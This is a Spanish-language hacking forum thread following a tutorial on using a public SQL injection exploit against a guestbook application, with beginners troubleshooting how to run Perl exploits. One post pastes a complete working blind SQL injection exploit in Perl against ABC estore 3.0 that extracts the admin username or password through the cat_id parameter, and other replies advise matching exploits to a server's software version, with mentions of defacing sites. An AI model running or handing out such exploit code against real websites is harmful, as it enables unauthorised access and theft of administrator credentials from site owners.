Analisis Basico de EXPLOIT SQL INYECTION [MGB 0.5.4.5 ] By OzX

[*ZerOCooL*]

Hola a tods! !
Me podrian ayudar ..
Me sale exploit failed.. porq sera??
 Espero su ayuda!

 Salu2! 

[Zirkua]

Eso porque ese libor de visitas no es compatible!Pero por dios me estoy fijando en vuestros post!Ya po hacer el manual mal!No por meter cuatro comandos en una consola y compilar un exploit codeado en perl, enciam ni habias codeado vosotros el exploit ni habeis encontrando el bug!yo la seccion esta no la soporto por eso!Solo hacen que aprovecharse de bugs ya explotados y compilar sus exploit ya codeados por alguien que si de de verdad sabe!mi opinion

zirkua

[GeRaNgEl_88]

Grax OZX por este gran tuto!
Descargando!

[aima]

gracias tio pero cierra ese puerto de esa web jeje bueno el tuto es bueno jeje si fuera el tuto en la escala del 1 al 10 sin duda te pondria 10

[goku93]

Hola y perdon por esta preguna pero....

cuando hago este comando perl exploit.pl  dice que pel no se reconoce como un comando interno o externo , a que se debe esto?

a si muy buen tutorial solo me falta resolver el comando

[*ZerOCooL*]

Man  alomejor no tiens instalado el "Active perl" ... Asegurate q lo tengas
instalado..
    Salu2

[Zirkua]

Muy bueno el tuto, me encanta como enseñas a la gente hacer lameradas sobre esto, ahora no hay un libro de visitas que no ponga hacked by...!Jaja me encanta tambien lo que pone de by OzX, pense que esta vulnerabilidad la habia encontrado y codeado el este exploit en perl SlimTim10!XDD tu solo dices como utilizarlo no?y el merito del trabajo que lo hagan otros, aun estoy esperando tu propio tutorial donde vea el manual de como utiliza un exploit pero codeado por ti!XDDD

Saludos y suerte con tus tutoriales!

zirkua

[wooplox]

heyy jeje. no se que paso todo iva bn pero al al usar el exploit dice

--cant open perl script "exploit.pl": no such file or dyrectory

[_mÙëK§™_]

heyy jeje. no se que paso todo iva bn pero al al usar el exploit dice

--cant open perl script "exploit.pl": no such file or dyrectory

tienes ke mover el exploit a la carpeta de archivos por compilar de tu interprete perl

Salu2

[wooplox]

tengo una pregunta en el exploit que tu usaste sabes como buscar en google las paginas vulnerables porke dice

google dork.....
--------------------------------------

pero digamos en otro exploit como sabre o hay otra forma de saber ke paginas son vulnerables

ejemplo:

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[1])
{
 print "\n  |-------------------------------------------------|";
 print "\n  |               newhack[dot]org                   |";
 print "\n  |-------------------------------------------------|";
 print "\n  |   ABC estore 3.0 (cat_id) Blind SQL Injection   |";
 print "\n  |     Found by k1tk4t [k1tk4t(at)newhack.org]     |";
 print "\n  |   DNX Code [dnx(at)hackermail.com] | Modified   |";
 print "\n  |-------------------------------------------------|";
 print "\n[!] Vendor: http://www.webtoolup.com/";
 print "\n[!] Bug: in the index.php script, u can inject sql code in the (cat_id) parameter";
 print "\n[!] Need Subcategories Product for success exploit";
 print "\n[!] Usage: perl abcestore.pl [Host] [Path] <Options>";
 print "\n[!] Example: perl abcestore.pl 127.0.0.1 /shop/ -c 10 -o 1 -t store_config";
 print "\n[!] Options:";
 print "\n       -c [no]       Valid cat_id products with subcategories, default is 1";
 print "\n       -o [no]       1 = get username (default)";
 print "\n                     2 = get password";
 print "\n       -t [name]     Changes the admin table name, default is store_config";
 print "\n       -p [ip:port]  Proxy support";
 print "\n";
 exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $cat     = 1;
my $column  = "user";
my $table   = "store_config";
my %options = ();
GetOptions(\%options, "c=i", "o=i", "t=s", "p=s");

print "[!] Exploiting...\n";

if($options{"c"}) { $cat = $options{"c"}; }
if($options{"o"} && $options{"o"} == 2) { $column = "pass"; }
if($options{"t"}) { $table = $options{"t"}; }

syswrite(STDOUT, "[!] Data : ", 12);

for(my $i = 1; $i <= 32; $i++)
{
 my $found = 0;
 my $h = 48;
 while(!$found && $h <= 57)
 {
   if(istrue2($host, $path, $table, $i, $h))
   {
     $found = 1;
     syswrite(STDOUT, chr($h), 1);
   }
   $h++;
 }
 if(!$found)
 {
   $h = 97;
   while(!$found && $h <= 122)
   {
     if(istrue2($host, $path, $table, $i, $h))
     {
       $found = 1;
       syswrite(STDOUT, chr($h), 1);
     }
     $h++;
   }
 }
}

print "\n[!] Exploit done\n";

sub istrue2
{
 my $host  = shift;
 my $path  = shift;
 my $table = shift;
 my $i     = shift;
 my $h     = shift;

 my $ua = LWP::UserAgent->new;
 my $url = "http://".$host.$path."index.php?cat_id=".$cat."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),".$i.",1)=CHAR(".$h.")";

 if($options{"p"})
 {
   $ua->proxy('http', "http://".$options{"p"});
 }

 my $response = $ua->get($url);
 my $content = $response->content;
 my $regexp = "Subcategories";

 if($content =~ /$regexp/)
 {
   return 1;
 }
 else
 {
   return 0;
 }
}

# milw0rm.com [2007-08-29]

[_mÙëK§™_]

ABC estore 3.0

Solo es vulnerable a ese servicio.

Tienes que saber que servicios corre el server y de ahi buscar exploit.

Ej: corre apache en version 1.0 , se busca exploit para esa version.

Salu2

[Kira_L]

problema con el manual de exploit.Cuando entro en cmd pongo perl exploit.pl y no me lo abre no se por que.Con este exploit es posible manipular lo que quieras de la pagin a no? Gracias

[Cônc3pt]

Muchas gracias por el tuto, hace poco que empecé con esto de los Exploits i me fué muy bien. Muy bien explicado OzX!


Salu2 

EDIT: Sorry por revivir post, no me fijé que estaba muerto ya.. lo siento